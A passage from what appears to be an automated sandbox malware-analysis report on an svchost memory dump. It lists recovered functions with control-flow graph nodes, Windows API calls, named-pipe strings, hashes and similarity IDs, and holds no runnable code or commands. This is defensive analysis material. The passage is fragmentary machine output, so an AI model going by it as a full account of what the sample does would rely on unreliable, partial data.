                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 201 233b91b6910-233b91b6916 202 233b91b6951-233b91b695b 201->202 203 233b91b6918-233b91b691b 201->203 204 233b91b6a78-233b91b6a8d 202->204 205 233b91b691d-233b91b6920 203->205 206 233b91b6945-233b91b6984 call 233b91b6fc0 203->206 210 233b91b6a9c-233b91b6ab6 call 233b91b6e54 204->210 211 233b91b6a8f 204->211 208 233b91b6922-233b91b6925 205->208 209 233b91b6938 __scrt_dllmain_crt_thread_attach 205->209 224 233b91b6a52 206->224 225 233b91b698a-233b91b699f call 233b91b6e54 206->225 216 233b91b6931-233b91b6936 call 233b91b6f04 208->216 217 233b91b6927-233b91b6930 208->217 214 233b91b693d-233b91b6944 209->214 222 233b91b6aef-233b91b6b20 call 233b91b7190 210->222 223 233b91b6ab8-233b91b6aed call 233b91b6f7c call 233b91b6e1c call 233b91b7318 call 233b91b7130 call 233b91b7154 call 233b91b6fac 210->223 212 233b91b6a91-233b91b6a9b 211->212 216->214 233 233b91b6b22-233b91b6b28 222->233 234 233b91b6b31-233b91b6b37 222->234 223->212 228 233b91b6a54-233b91b6a69 224->228 236 233b91b69a5-233b91b69b6 call 233b91b6ec4 225->236 237 233b91b6a6a-233b91b6a77 call 233b91b7190 225->237 233->234 238 233b91b6b2a-233b91b6b2c 233->238 239 233b91b6b7e-233b91b6b94 call 233b91b268c 234->239 240 233b91b6b39-233b91b6b43 234->240 251 233b91b69b8-233b91b69dc call 233b91b72dc call 233b91b6e0c call 233b91b6e38 call 233b91bac0c 236->251 252 233b91b6a07-233b91b6a11 call 233b91b7130 236->252 237->204 245 233b91b6c1f-233b91b6c2c 238->245 258 233b91b6bcc-233b91b6bce 239->258 259 233b91b6b96-233b91b6b98 239->259 246 233b91b6b4f-233b91b6b5d call 233b91c5780 240->246 247 233b91b6b45-233b91b6b4d 240->247 254 233b91b6b63-233b91b6b78 call 233b91b6910 246->254 268 233b91b6c15-233b91b6c1d 246->268 247->254 251->252 304 233b91b69de-233b91b69e5 __scrt_dllmain_after_initialize_c 251->304 252->224 272 233b91b6a13-233b91b6a1f call 233b91b7180 252->272 254->239 254->268 266 233b91b6bd0-233b91b6bd3 258->266 267 233b91b6bd5-233b91b6bea call 233b91b6910 258->267 259->258 265 233b91b6b9a-233b91b6bbc call 233b91b268c call 233b91b6a78 259->265 265->258 298 233b91b6bbe-233b91b6bc6 call 233b91c5780 265->298 266->267 266->268 267->268 286 233b91b6bec-233b91b6bf6 267->286 268->245 291 233b91b6a21-233b91b6a2b call 233b91b7098 272->291 292 233b91b6a45-233b91b6a50 272->292 288 233b91b6c01-233b91b6c11 call 233b91c5780 286->288 289 233b91b6bf8-233b91b6bff 286->289 288->268 289->268 291->292 303 233b91b6a2d-233b91b6a3b 291->303 292->228 298->258 303->292 304->252 305 233b91b69e7-233b91b6a04 call 233b91babc8 304->305 305->252
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                          • API String ID: 190073905-1786718095
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 737aaf6eaa7498847d583f5ff4b0cae87b5c87ee52f47c453fde23f079142786
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 7E81F2217046018AFB50EB26D59E399E2F3EBA57ECF548025EA0987796DF3CCB45B700
                                                          Function 00000233B91ECE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 308 233b91ece28-233b91ece4a call 233b91f6080 311 233b91ece4c-233b91ece57 FlsGetValue 308->311 312 233b91ece69-233b91ece74 FlsSetValue 308->312 313 233b91ece59-233b91ece61 311->313 314 233b91ece63 311->314 315 233b91ece7b-233b91ece80 312->315 316 233b91ece76-233b91ece79 312->316 317 233b91eced5-233b91ecee0 SetLastError 313->317 314->312 318 233b91ece85 call 233b91ed6cc 315->318 316->317 319 233b91ecee2-233b91ecef4 317->319 320 233b91ecef5-233b91ecf0b call 233b91ec748 317->320 321 233b91ece8a-233b91ece96 318->321 334 233b91ecf0d-233b91ecf18 FlsGetValue 320->334 335 233b91ecf28-233b91ecf33 FlsSetValue 320->335 322 233b91ecea8-233b91eceb2 FlsSetValue 321->322 323 233b91ece98-233b91ece9f FlsSetValue 321->323 326 233b91ecec6-233b91eced0 call 233b91ecb94 call 233b91ed744 322->326 327 233b91eceb4-233b91ecec4 FlsSetValue 322->327 325 233b91ecea1-233b91ecea6 call 233b91ed744 323->325 325->316 326->317 327->325 339 233b91ecf22 334->339 340 233b91ecf1a-233b91ecf1e 334->340 336 233b91ecf98-233b91ecf9f call 233b91ec748 335->336 337 233b91ecf35-233b91ecf3a 335->337 341 233b91ecf3f call 233b91ed6cc 337->341 339->335 340->336 343 233b91ecf20 340->343 345 233b91ecf44-233b91ecf50 341->345 344 233b91ecf8f-233b91ecf97 343->344 347 233b91ecf62-233b91ecf6c FlsSetValue 345->347 348 233b91ecf52-233b91ecf59 FlsSetValue 345->348 350 233b91ecf80-233b91ecf88 call 233b91ecb94 347->350 351 233b91ecf6e-233b91ecf7e FlsSetValue 347->351 349 233b91ecf5b-233b91ecf60 call 233b91ed744 348->349 349->336 350->344 356 233b91ecf8a call 233b91ed744 350->356 351->349 356->344
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 00000233B91ECE37
                                                          • FlsGetValue.KERNEL32(?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECE4C
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECE6D
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECE9A
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECEAB
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECEBC
                                                          • SetLastError.KERNEL32 ref: 00000233B91ECED7
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECF0D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000233B91EECCC,?,?,?,?,00000233B91EBF9F,?,?,?,?,?,00000233B91E7AB0), ref: 00000233B91ECF2C
                                                            • Part of subcall function 00000233B91ED6CC: HeapAlloc.KERNEL32 ref: 00000233B91ED721
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECF54
                                                            • Part of subcall function 00000233B91ED744: HeapFree.KERNEL32 ref: 00000233B91ED75A
                                                            • Part of subcall function 00000233B91ED744: GetLastError.KERNEL32 ref: 00000233B91ED764
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECF65
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000233B91F0A6B,?,?,?,00000233B91F045C,?,?,?,00000233B91EC84F), ref: 00000233B91ECF76
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction ID: ace5a751f6ca1d0fccbdd938c3d3e9e97277885a66b20667afee2d27ef016c37
                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction Fuzzy Hash: 8A416224601A4C4EFA68E735595D379E2735B887BCF684724FC760A7E7DE2C8B41A200
                                                          Function 00000233B91E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2171963597-1373409510
                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction ID: 72860cf4b210ac1b5d9cb8300c0f4ca9b9d23a4a2c90067c8916fa65f1178533
                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction Fuzzy Hash: F8213D36614A4882EB10CB25E458759A7B2F789BE8F604215EA5902BA9CF3CC349DB00
                                                          Function 00000233B91EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 576 233b91ea544-233b91ea5ac call 233b91eb414 579 233b91ea5b2-233b91ea5b5 576->579 580 233b91eaa13-233b91eaa1b call 233b91ec748 576->580 579->580 581 233b91ea5bb-233b91ea5c1 579->581 583 233b91ea690-233b91ea6a2 581->583 584 233b91ea5c7-233b91ea5cb 581->584 586 233b91ea6a8-233b91ea6ac 583->586 587 233b91ea963-233b91ea967 583->587 584->583 588 233b91ea5d1-233b91ea5dc 584->588 586->587 589 233b91ea6b2-233b91ea6bd 586->589 591 233b91ea9a0-233b91ea9aa call 233b91e9634 587->591 592 233b91ea969-233b91ea970 587->592 588->583 590 233b91ea5e2-233b91ea5e7 588->590 589->587 593 233b91ea6c3-233b91ea6ca 589->593 590->583 594 233b91ea5ed-233b91ea5f7 call 233b91e9634 590->594 591->580 602 233b91ea9ac-233b91ea9cb call 233b91e7940 591->602 592->580 595 233b91ea976-233b91ea99b call 233b91eaa1c 592->595 597 233b91ea6d0-233b91ea707 call 233b91e9a10 593->597 598 233b91ea894-233b91ea8a0 593->598 594->602 610 233b91ea5fd-233b91ea628 call 233b91e9634 * 2 call 233b91e9d24 594->610 595->591 597->598 614 233b91ea70d-233b91ea715 597->614 598->591 603 233b91ea8a6-233b91ea8aa 598->603 607 233b91ea8ac-233b91ea8b8 call 233b91e9ce4 603->607 608 233b91ea8ba-233b91ea8c2 603->608 607->608 620 233b91ea8db-233b91ea8e3 607->620 608->591 613 233b91ea8c8-233b91ea8d5 call 233b91e98b4 608->613 642 233b91ea62a-233b91ea62e 610->642 643 233b91ea648-233b91ea652 call 233b91e9634 610->643 613->591 613->620 618 233b91ea719-233b91ea74b 614->618 622 233b91ea751-233b91ea75c 618->622 623 233b91ea887-233b91ea88e 618->623 625 233b91ea8e9-233b91ea8ed 620->625 626 233b91ea9f6-233b91eaa12 call 233b91e9634 * 2 call 233b91ec6a8 620->626 622->623 627 233b91ea762-233b91ea77b 622->627 623->598 623->618 629 233b91ea8ef-233b91ea8fe call 233b91e9ce4 625->629 630 233b91ea900 625->630 626->580 631 233b91ea781-233b91ea7c6 call 233b91e9cf8 * 2 627->631 632 233b91ea874-233b91ea879 627->632 635 233b91ea903-233b91ea90d call 233b91eb4ac 629->635 630->635 657 233b91ea7c8-233b91ea7ee call 233b91e9cf8 call 233b91eac38 631->657 658 233b91ea804-233b91ea80a 631->658 638 233b91ea884 632->638 635->591 655 233b91ea913-233b91ea961 call 233b91e9944 call 233b91e9b50 635->655 638->623 642->643 649 233b91ea630-233b91ea63b 642->649 643->583 661 233b91ea654-233b91ea674 call 233b91e9634 * 2 call 233b91eb4ac 643->661 649->643 654 233b91ea63d-233b91ea642 649->654 654->580 654->643 655->591 676 233b91ea7f0-233b91ea802 657->676 677 233b91ea815-233b91ea872 call 233b91ea470 657->677 665 233b91ea87b 658->665 666 233b91ea80c-233b91ea810 658->666 682 233b91ea68b 661->682 683 233b91ea676-233b91ea680 call 233b91eb59c 661->683 670 233b91ea880 665->670 666->631 670->638 676->657 676->658 677->670 682->583 686 233b91ea9f0-233b91ea9f5 call 233b91ec6a8 683->686 687 233b91ea686-233b91ea9ef call 233b91e92ac call 233b91eaff4 call 233b91e94a0 683->687 686->626 687->686
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction ID: a2c31bf51c82885bc918ab0a515507da657b57f2bf13457ad53e55c697508e7d
                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction Fuzzy Hash: 72E19D72601B88CAEB20DF65D48839DB7B2F799B9CF510116EE8957B96CB38C381D700
                                                          Function 00000233B91B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 455 233b91b9944-233b91b99ac call 233b91ba814 458 233b91b99b2-233b91b99b5 455->458 459 233b91b9e13-233b91b9e1b call 233b91bbb48 455->459 458->459 460 233b91b99bb-233b91b99c1 458->460 462 233b91b9a90-233b91b9aa2 460->462 463 233b91b99c7-233b91b99cb 460->463 465 233b91b9d63-233b91b9d67 462->465 466 233b91b9aa8-233b91b9aac 462->466 463->462 467 233b91b99d1-233b91b99dc 463->467 470 233b91b9da0-233b91b9daa call 233b91b8a34 465->470 471 233b91b9d69-233b91b9d70 465->471 466->465 468 233b91b9ab2-233b91b9abd 466->468 467->462 469 233b91b99e2-233b91b99e7 467->469 468->465 473 233b91b9ac3-233b91b9aca 468->473 469->462 474 233b91b99ed-233b91b99f7 call 233b91b8a34 469->474 470->459 481 233b91b9dac-233b91b9dcb call 233b91b6d40 470->481 471->459 475 233b91b9d76-233b91b9d9b call 233b91b9e1c 471->475 478 233b91b9ad0-233b91b9b07 call 233b91b8e10 473->478 479 233b91b9c94-233b91b9ca0 473->479 474->481 489 233b91b99fd-233b91b9a28 call 233b91b8a34 * 2 call 233b91b9124 474->489 475->470 478->479 493 233b91b9b0d-233b91b9b15 478->493 479->470 482 233b91b9ca6-233b91b9caa 479->482 486 233b91b9cac-233b91b9cb8 call 233b91b90e4 482->486 487 233b91b9cba-233b91b9cc2 482->487 486->487 500 233b91b9cdb-233b91b9ce3 486->500 487->470 492 233b91b9cc8-233b91b9cd5 call 233b91b8cb4 487->492 523 233b91b9a2a-233b91b9a2e 489->523 524 233b91b9a48-233b91b9a52 call 233b91b8a34 489->524 492->470 492->500 497 233b91b9b19-233b91b9b4b 493->497 502 233b91b9b51-233b91b9b5c 497->502 503 233b91b9c87-233b91b9c8e 497->503 504 233b91b9df6-233b91b9e12 call 233b91b8a34 * 2 call 233b91bbaa8 500->504 505 233b91b9ce9-233b91b9ced 500->505 502->503 506 233b91b9b62-233b91b9b7b 502->506 503->479 503->497 504->459 508 233b91b9d00 505->508 509 233b91b9cef-233b91b9cfe call 233b91b90e4 505->509 510 233b91b9b81-233b91b9bc6 call 233b91b90f8 * 2 506->510 511 233b91b9c74-233b91b9c79 506->511 519 233b91b9d03-233b91b9d0d call 233b91ba8ac 508->519 509->519 536 233b91b9c04-233b91b9c0a 510->536 537 233b91b9bc8-233b91b9bee call 233b91b90f8 call 233b91ba038 510->537 516 233b91b9c84 511->516 516->503 519->470 534 233b91b9d13-233b91b9d61 call 233b91b8d44 call 233b91b8f50 519->534 523->524 528 233b91b9a30-233b91b9a3b 523->528 524->462 540 233b91b9a54-233b91b9a74 call 233b91b8a34 * 2 call 233b91ba8ac 524->540 528->524 533 233b91b9a3d-233b91b9a42 528->533 533->459 533->524 534->470 544 233b91b9c0c-233b91b9c10 536->544 545 233b91b9c7b 536->545 555 233b91b9bf0-233b91b9c02 537->555 556 233b91b9c15-233b91b9c72 call 233b91b9870 537->556 561 233b91b9a8b 540->561 562 233b91b9a76-233b91b9a80 call 233b91ba99c 540->562 544->510 546 233b91b9c80 545->546 546->516 555->536 555->537 556->546 561->462 565 233b91b9df0-233b91b9df5 call 233b91bbaa8 562->565 566 233b91b9a86-233b91b9def call 233b91b86ac call 233b91ba3f4 call 233b91b88a0 562->566 565->504 566->565
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618317741.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91b0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction ID: 56d44363b9093435bfa6bd8543330d4fadb0ec6b235e4424d6377fefce6d41a5
                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction Fuzzy Hash: EDE17B72604B808AEB60DF65D48839DB7B7F749B9CF100516EE8957B9ACB38C792D700
                                                          Function 00000233B91EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction ID: 91dda1b3de80ca6407511a5e87d35753970f041339a301475c50bded6381d6fd
                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction Fuzzy Hash: D441D422315E089AFB16CB66A80C759A3B7FB45BE8F2941259D0E87785EE3CC745A310
                                                          Function 00000233B91E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 725 233b91e104c-233b91e10b9 RegQueryInfoKeyW 726 233b91e10bf-233b91e10c9 725->726 727 233b91e11b5-233b91e11d0 725->727 726->727 728 233b91e10cf-233b91e111f RegEnumValueW 726->728 729 233b91e11a5-233b91e11af 728->729 730 233b91e1125-233b91e112a 728->730 729->727 729->728 730->729 731 233b91e112c-233b91e1135 730->731 732 233b91e1147-233b91e114c 731->732 733 233b91e1137 731->733 735 233b91e114e-233b91e1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 732->735 736 233b91e1199-233b91e11a3 732->736 734 233b91e113b-233b91e113f 733->734 734->729 737 233b91e1141-233b91e1145 734->737 735->736 736->729 737->732 737->734
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction ID: ddfa171bdcf65ac263f16e1d3ebeea146a45f8b8b8bf9f7f9ed9d1b889923b9b
                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                          • Instruction Fuzzy Hash: F8411C73214B88CAE760CF61E44879AB7B2F389B99F448115DA8A07658DF3CC745DB40
                                                          Function 00000233B91ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,00000233B91EC7DE,?,?,?,?,?,?,?,?,00000233B91ECF9D,?,?,00000001), ref: 00000233B91ED087
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91EC7DE,?,?,?,?,?,?,?,?,00000233B91ECF9D,?,?,00000001), ref: 00000233B91ED0A6
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91EC7DE,?,?,?,?,?,?,?,?,00000233B91ECF9D,?,?,00000001), ref: 00000233B91ED0CE
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91EC7DE,?,?,?,?,?,?,?,?,00000233B91ECF9D,?,?,00000001), ref: 00000233B91ED0DF
                                                          • FlsSetValue.KERNEL32(?,?,?,00000233B91EC7DE,?,?,?,?,?,?,?,?,00000233B91ECF9D,?,?,00000001), ref: 00000233B91ED0F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction ID: 4d2b81a96dc04df6f1e6226729fae93052c2ea56462be728e2d5402f3318b8c4
                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                          • Instruction Fuzzy Hash: 7C11C824705A4C4AFA68D735595D379E1735B443FCF688324AC7E0B7DADE2CCB42A210
                                                          Function 00000233B91E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: 82a3d0b9931569eefde52418ee1fab31ac402adbe67a2b18c8fc5b96677ed4fb
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 3481B621B00A0D8EFB54EB65A44D359E2F3AB8578CF588415E948877B7DB3CC745B720
                                                          Function 00000233B91E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction ID: 15d8e17e8f4f6b694e98dda8e388bca8900ddf3987f01f05ada05b52b1cb9b4a
                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                          • Instruction Fuzzy Hash: 8131E821312F48D9EE25DF42A508759B3B6F748BA8F690925EE1E0B396DF3DC7859300
                                                          Function 00000233B91F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction ID: a194ee36bdd31e395f4992f0291969353ef73302127a9b26d9bcde89b3b500c0
                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                          • Instruction Fuzzy Hash: 10116D22714B4886E790CB52E848319F6B1F788FE8F144224EA5A87796DF3CCB158744
                                                          Function 00000233B91E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction ID: 00de47caa72b811a4d0f3fce3872d1d7d1aad49857adb8dead946b87cce7296f
                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                          • Instruction Fuzzy Hash: 9C115B26704B4987EF14DB21E40876AB2B2FB88BC9F540129DE89077A9EF3DC746D704
                                                          Function 00000233B91E5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000002A.00000002.2618857576.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_42_2_233b91e0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction ID: 4dffc80bce4ca270a394b51c7571b00e64439a5cc7cda0374bd89fb36124b693
                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                          • Instruction Fuzzy Hash: 8BD19A76604F8886EA70DB06E49835AB7B1F388B88F114116EACD47BA9DF3CC741DB00
                                                          Function 00000233B91E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
